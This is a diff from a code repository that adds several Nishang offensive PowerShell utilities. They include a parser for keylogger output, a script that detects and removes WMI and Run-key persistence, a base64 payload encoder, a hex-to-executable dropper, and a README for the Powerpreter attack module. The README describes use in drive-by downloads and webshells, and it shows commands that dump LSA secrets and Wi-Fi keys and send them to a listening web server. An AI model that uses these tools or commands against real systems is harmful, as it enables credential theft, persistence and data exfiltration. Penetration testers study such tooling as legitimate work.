||||||
|
Write-Verbose $command
|
||||||
|
Out-File -InputObject $command -FilePath $OutputCommandFilePath
|
||||||
|
Write-Output "Encoded command written to $OutputCommandFilePath"
|
||||||
|
}
|
||||||
|
}
|
197
aspx/nishang/Utility/Parse_Keys.ps1
Normal file
197
aspx/nishang/Utility/Parse_Keys.ps1
Normal file
|
@ -0,0 +1,197 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
A script which could be used to parse keys logged
|
||||||
|
by Kelogger payload of Nishang.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This script parses keys logged by Keylogger payload
|
||||||
|
of Nishang.
|
||||||
|
|
||||||
|
.PARAMETER RawKeys
|
||||||
|
Name of the text file which contains logged keys.
|
||||||
|
|
||||||
|
.PARAMETER LoggedKeys
|
||||||
|
Name of the text file where parsed keys will be stored
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Parse_Keys raw.txt logged.txt
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.blogspot.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Parse_Keys
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$RawKeys,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$LoggedKeys
|
||||||
|
)
|
||||||
|
|
||||||
|
[String]$data = Get-Content $RawKeys
|
||||||
|
$keys = $data.split(" ");
|
||||||
|
|
||||||
|
foreach ($i in $keys)
|
||||||
|
{
|
||||||
|
|
||||||
|
switch ($i)
|
||||||
|
{
|
||||||
|
|
||||||
|
48 {$out = $out + "0"}
|
||||||
|
49 {$out = $out + "1"}
|
||||||
|
50 {$out = $out + "2"}
|
||||||
|
51 {$out = $out + "3"}
|
||||||
|
52 {$out = $out + "4"}
|
||||||
|
53 {$out = $out + "5"}
|
||||||
|
54 {$out = $out + "6"}
|
||||||
|
55 {$out = $out + "7"}
|
||||||
|
56 {$out = $out + "8"}
|
||||||
|
57 {$out = $out + "9"}
|
||||||
|
S-48 {$out = $out + ")"}
|
||||||
|
S-49 {$out = $out + "!"}
|
||||||
|
S-50 {$out = $out + "@"}
|
||||||
|
S-51 {$out = $out + "#"}
|
||||||
|
S-52 {$out = $out + "$"}
|
||||||
|
S-53 {$out = $out + "%"}
|
||||||
|
S-54 {$out = $out + "^"}
|
||||||
|
S-55 {$out = $out + "&"}
|
||||||
|
S-56 {$out = $out + "*"}
|
||||||
|
S-57 {$out = $out + "("}
|
||||||
|
65 {$out = $out + "A"}
|
||||||
|
66 {$out = $out + "B"}
|
||||||
|
67 {$out = $out + "C"}
|
||||||
|
68 {$out = $out + "D"}
|
||||||
|
69 {$out = $out + "E"}
|
||||||
|
70 {$out = $out + "F"}
|
||||||
|
71 {$out = $out + "G"}
|
||||||
|
72 {$out = $out + "H"}
|
||||||
|
73 {$out = $out + "I"}
|
||||||
|
74 {$out = $out + "J"}
|
||||||
|
75 {$out = $out + "K"}
|
||||||
|
76 {$out = $out + "L"}
|
||||||
|
77 {$out = $out + "M"}
|
||||||
|
78 {$out = $out + "N"}
|
||||||
|
79 {$out = $out + "O"}
|
||||||
|
80 {$out = $out + "P"}
|
||||||
|
81 {$out = $out + "Q"}
|
||||||
|
82 {$out = $out + "R"}
|
||||||
|
83 {$out = $out + "S"}
|
||||||
|
84 {$out = $out + "T"}
|
||||||
|
85 {$out = $out + "U"}
|
||||||
|
86 {$out = $out + "V"}
|
||||||
|
87 {$out = $out + "W"}
|
||||||
|
88 {$out = $out + "X"}
|
||||||
|
89 {$out = $out + "Y"}
|
||||||
|
90 {$out = $out + "Z"}
|
||||||
|
S-65 {$out = $out + "a"}
|
||||||
|
S-66 {$out = $out + "b"}
|
||||||
|
S-67 {$out = $out + "c"}
|
||||||
|
S-68 {$out = $out + "d"}
|
||||||
|
S-69 {$out = $out + "e"}
|
||||||
|
S-70 {$out = $out + "f"}
|
||||||
|
S-71 {$out = $out + "g"}
|
||||||
|
S-72 {$out = $out + "h"}
|
||||||
|
S-73 {$out = $out + "i"}
|
||||||
|
S-74 {$out = $out + "j"}
|
||||||
|
S-75 {$out = $out + "k"}
|
||||||
|
S-76 {$out = $out + "l"}
|
||||||
|
S-77 {$out = $out + "m"}
|
||||||
|
S-78 {$out = $out + "n"}
|
||||||
|
S-79 {$out = $out + "o"}
|
||||||
|
S-80 {$out = $out + "p"}
|
||||||
|
S-81 {$out = $out + "q"}
|
||||||
|
S-82 {$out = $out + "r"}
|
||||||
|
S-83 {$out = $out + "s"}
|
||||||
|
S-84 {$out = $out + "t"}
|
||||||
|
S-85 {$out = $out + "u"}
|
||||||
|
S-86 {$out = $out + "v"}
|
||||||
|
S-87 {$out = $out + "w"}
|
||||||
|
S-88 {$out = $out + "x"}
|
||||||
|
S-89 {$out = $out + "y"}
|
||||||
|
S-90 {$out = $out + "z"}
|
||||||
|
96 {$out = $out + "0"}
|
||||||
|
97 {$out = $out + "1"}
|
||||||
|
98 {$out = $out + "2"}
|
||||||
|
99 {$out = $out + "3"}
|
||||||
|
100 {$out = $out + "4"}
|
||||||
|
101 {$out = $out + "5"}
|
||||||
|
102 {$out = $out + "6"}
|
||||||
|
103 {$out = $out + "7"}
|
||||||
|
104 {$out = $out + "8"}
|
||||||
|
105 {$out = $out + "9"}
|
||||||
|
186 {$out = $out + ";"}
|
||||||
|
187 {$out = $out + "="}
|
||||||
|
188 {$out = $out + ","}
|
||||||
|
189 {$out = $out + "-"}
|
||||||
|
190 {$out = $out + "."}
|
||||||
|
191 {$out = $out + "/"}
|
||||||
|
192 {$out = $out + "``"}
|
||||||
|
S-186 {$out = $out + ":"}
|
||||||
|
S-187 {$out = $out + "+"}
|
||||||
|
S-188 {$out = $out + "<"}
|
||||||
|
S-189 {$out = $out + "_ "}
|
||||||
|
S-190 {$out = $out + ">"}
|
||||||
|
S-191 {$out = $out + "?"}
|
||||||
|
S-192 {$out = $out + "~"}
|
||||||
|
#1 {$out = $out + "Left Mouse Click"}
|
||||||
|
#2 {$out = $out + "Right Mouse Click"}
|
||||||
|
#4 {$out = $out + "Third Mouse Click"}
|
||||||
|
#9 {$out = $out + "Tab"}
|
||||||
|
#164 {$out = $out + "Left Alt"}
|
||||||
|
#165 {$out = $out + "Right Alt"}
|
||||||
|
#162 {$out = $out + "Left Ctrl"}
|
||||||
|
#163 {$out = $out + "Right Ctrl"}
|
||||||
|
#33 {$out = $out + "Page Up"}
|
||||||
|
#34 {$out = $out + "Page Down"}
|
||||||
|
#35 {$out = $out + "Home"}
|
||||||
|
#36 {$out = $out + "End"}
|
||||||
|
#37 {$out = $out + "Left Arrow"}
|
||||||
|
#38 {$out = $out + "Up Arrow"}
|
||||||
|
#39 {$out = $out + "Right Arrow"}
|
||||||
|
#40 {$out = $out + "Down Arrow"}
|
||||||
|
#37 {$out = $out + "Left Arrow"}
|
||||||
|
#38 {$out = $out + "Up Arrow"}
|
||||||
|
#39 {$out = $out + "Right Arrow"}
|
||||||
|
#44 {$out = $out + "Print Screen"}
|
||||||
|
#45 {$out = $out + "Insert"}
|
||||||
|
46 {$out = $out + "Delete"}
|
||||||
|
8 {$out = $out + "Backspace"}
|
||||||
|
32 {$out = $out + " "}
|
||||||
|
13 {$out = $out + "Enter"}
|
||||||
|
#19 {$out = $out + "Pause"}
|
||||||
|
#20 {$out = $out + "Caps Lock"}
|
||||||
|
#144 {$out = $out + "Num Lock"}
|
||||||
|
#145 {$out = $out + "Scroll Lock"}
|
||||||
|
#27 {$out = $out + "Escape"}
|
||||||
|
#91 {$out = $out + "Window Key"}
|
||||||
|
#111 {$out = $out + "/"}
|
||||||
|
#106 {$out = $out + "*"}
|
||||||
|
#107 {$out = $out + "+"}
|
||||||
|
#112 {$out = $out + "F1"}
|
||||||
|
#113 {$out = $out + "F2"}
|
||||||
|
#114 {$out = $out + "F3"}
|
||||||
|
#115 {$out = $out + "F4"}
|
||||||
|
#116 {$out = $out + "F5"}
|
||||||
|
#117 {$out = $out + "F6"}
|
||||||
|
#118 {$out = $out + "F7"}
|
||||||
|
#119 {$out = $out + "F8"}
|
||||||
|
#120 {$out = $out + "F9"}
|
||||||
|
#121 {$out = $out + "F10"}
|
||||||
|
#122 {$out = $out + "F11"}
|
||||||
|
#123 {$out = $out + "F12"}
|
||||||
|
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
Out-File -FilePath $LoggedKeys -Append -InputObject "$out"
|
||||||
|
}
|
||||||
|
|
72
aspx/nishang/Utility/Remove-Persistence.ps1
Normal file
72
aspx/nishang/Utility/Remove-Persistence.ps1
Normal file
|
@ -0,0 +1,72 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang script which could be used to clear the persistence added by Nishang payloads and scripts.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This script cleans WMI events and Registry keys added by various payloads and Add-persistence script.
|
||||||
|
Run the script as an Administrator to remove the WMI events.
|
||||||
|
|
||||||
|
.Example
|
||||||
|
PS > Remove-Persistence
|
||||||
|
|
||||||
|
Check for Persistence.
|
||||||
|
|
||||||
|
.Example
|
||||||
|
PS > Remove-Persistence -Remove
|
||||||
|
|
||||||
|
Remove the Persistence.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.blogspot.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Remove-Persistence
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0)]
|
||||||
|
[Switch]
|
||||||
|
$Remove
|
||||||
|
)
|
||||||
|
|
||||||
|
if ($Remove -eq $true)
|
||||||
|
{
|
||||||
|
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
|
||||||
|
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true)
|
||||||
|
{
|
||||||
|
Write-Warning "Run the Command as an Administrator. Removing Registry keys only."
|
||||||
|
Remove-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -ErrorAction SilentlyContinue
|
||||||
|
Break
|
||||||
|
}
|
||||||
|
|
||||||
|
Write-Output "Removing the WMI Events."
|
||||||
|
$filterName = "WindowsSanity"
|
||||||
|
gwmi __eventFilter -namespace root\subscription -filter "name='WindowsSanity'"| Remove-WmiObject
|
||||||
|
gwmi activeScriptEventConsumer -Namespace root\subscription | Remove-WmiObject
|
||||||
|
gwmi __filtertoconsumerbinding -Namespace root\subscription -Filter "Filter = ""__eventfilter.name='WindowsSanity'""" | Remove-WmiObject
|
||||||
|
Write-Output "Removing the Registry keys."
|
||||||
|
Remove-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -ErrorAction SilentlyContinue
|
||||||
|
}
|
||||||
|
$Regkey = Get-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -name Update -ErrorAction SilentlyContinue
|
||||||
|
$wmi_1 = gwmi __eventFilter -namespace root\subscription -filter "name='WindowsSanity'"
|
||||||
|
$wmi_2 = gwmi activeScriptEventConsumer -Namespace root\subscription
|
||||||
|
$wmi_3 = gwmi __filtertoconsumerbinding -Namespace root\subscription -Filter "Filter = ""__eventfilter.name='WindowsSanity'"""
|
||||||
|
if ($Regkey -ne $null )
|
||||||
|
{
|
||||||
|
Write-Warning "Run Registry key persistence found. Use with -Remove option to clean."
|
||||||
|
}
|
||||||
|
elseif (($wmi_1) -and ($wmi_2) -and ($wmi_3) -ne $null)
|
||||||
|
{
|
||||||
|
Write-Warning "WMI permanent event consumer persistence found. Use with -Remove option to clean."
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
Write-Output "No Persistence found."
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
}
|
||||||
|
|
59
aspx/nishang/Utility/StringToBase64.ps1
Normal file
59
aspx/nishang/Utility/StringToBase64.ps1
Normal file
|
@ -0,0 +1,59 @@
|
||||||
|
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang script which encodes a string to base64 string.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload encodes the given string to base64 string and writes it to base64encoded.txt in current directory.
|
||||||
|
|
||||||
|
.PARAMETER Str
|
||||||
|
The string to be encoded
|
||||||
|
|
||||||
|
.PARAMETER OutputFile
|
||||||
|
The path of the output file. Default is "encoded.txt" in the current working directory.
|
||||||
|
|
||||||
|
.PARAMETER IsString
|
||||||
|
Use this to specify if you are passing a string ins place of a filepath.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > StringToBase64 "start-process calc.exe" -IsString
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.blogspot.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function StringtoBase64
|
||||||
|
{
|
||||||
|
[CmdletBinding()]
|
||||||
|
Param( [Parameter(Position = 0, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$Str,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$outputfile=".\base64encoded.txt",
|
||||||
|
|
||||||
|
[Switch]
|
||||||
|
$IsString
|
||||||
|
)
|
||||||
|
|
||||||
|
if($IsString -eq $true)
|
||||||
|
{
|
||||||
|
|
||||||
|
$utfbytes = [System.Text.Encoding]::Unicode.GetBytes($Str)
|
||||||
|
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$utfbytes = [System.Text.Encoding]::Unicode.GetBytes((Get-Content $Str))
|
||||||
|
}
|
||||||
|
|
||||||
|
$base64string = [System.Convert]::ToBase64String($utfbytes)
|
||||||
|
Out-File -InputObject $base64string -Encoding ascii -FilePath "$outputfile"
|
||||||
|
Write-Output "Encoded data written to file $outputfile"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
41
aspx/nishang/Utility/TexttoExe.ps1
Normal file
41
aspx/nishang/Utility/TexttoExe.ps1
Normal file
|
@ -0,0 +1,41 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang script to convert a PE file in hex format to executable
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This script converts a PE file in hex to executable and writes it to user temp.
|
||||||
|
|
||||||
|
.PARAMETER Filename
|
||||||
|
Path of the hex text file from which executable will be created.
|
||||||
|
|
||||||
|
.PARAMETER EXE
|
||||||
|
Path where the executable should be created.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > TexttoExe C:\evil.text C:\exe\evil.exe
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function TexttoEXE
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param (
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$FileName,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $True)]
|
||||||
|
[String]$EXE
|
||||||
|
)
|
||||||
|
|
||||||
|
[String]$hexdump = get-content -path "$Filename"
|
||||||
|
[Byte[]] $temp = $hexdump -split ' '
|
||||||
|
[System.IO.File]::WriteAllBytes($EXE, $temp)
|
||||||
|
Write-Output "Executable written to file $EXE"
|
||||||
|
}
|
14
aspx/nishang/nishang.psm1
Normal file
14
aspx/nishang/nishang.psm1
Normal file
|
@ -0,0 +1,14 @@
|
||||||
|
|
||||||
|
<#
|
||||||
|
Import this module to use all the scripts in nishang, except Keylogger in current powershell session. The module must reside in the nishang folder.
|
||||||
|
|
||||||
|
PS > Import-Module .\nishang.psm1
|
||||||
|
|
||||||
|
http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
#Code stolen from here https://github.com/mattifestation/PowerSploit
|
||||||
|
Get-ChildItem -Recurse (Join-Path $PSScriptRoot *.ps1) | ForEach-Object { if ($_.Name -ne "Keylogger.ps1") {. $_.FullName}}
|
||||||
|
|
3884
aspx/nishang/powerpreter/Powerpreter.psm1
Normal file
3884
aspx/nishang/powerpreter/Powerpreter.psm1
Normal file
File diff suppressed because it is too large
Load diff
33
aspx/nishang/powerpreter/README.md
Normal file
33
aspx/nishang/powerpreter/README.md
Normal file
|
@ -0,0 +1,33 @@
|
||||||
|
#####Powerpreter is a script module which makes it useful in scenarios like drive-by-download, document attachments, webshells etc. where one may like to pull all the functionality in Nishang in a single file or where deployment is not easy to do. Powerpreter has persistence capabilities too. See examples for help in using it.
|
||||||
|
|
||||||
|
#####Examples
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
|
||||||
|
PS > Import-Module .\Powerpreter.psm1
|
||||||
|
|
||||||
|
PS> Get-Command -Module powerpreter
|
||||||
|
|
||||||
|
The first command imports the module in current powershell session.
|
||||||
|
|
||||||
|
The second command lists all the functions available with powerpreter.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
|
||||||
|
PS > Import-Module .\Powerpreter.psm1; Enable-DuplicateToken; Get-LSASecret
|
||||||
|
|
||||||
|
Use above command to import powerpreter in current powershell session and execute the two functions.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
|
||||||
|
PS > Import-Module .\Powerpreter.psm1; Persistence
|
||||||
|
|
||||||
|
Use above for reboot persistence
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
|
||||||
|
PS > Import-Module .\Powerpreter.psm1
|
||||||
|
|
||||||
|
PS > Get-WLAN-Keys | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
|
||||||
|
|
||||||
|
Use above for exfiltration to a webserver which logs POST requests.
|
Loading…
Reference in a new issue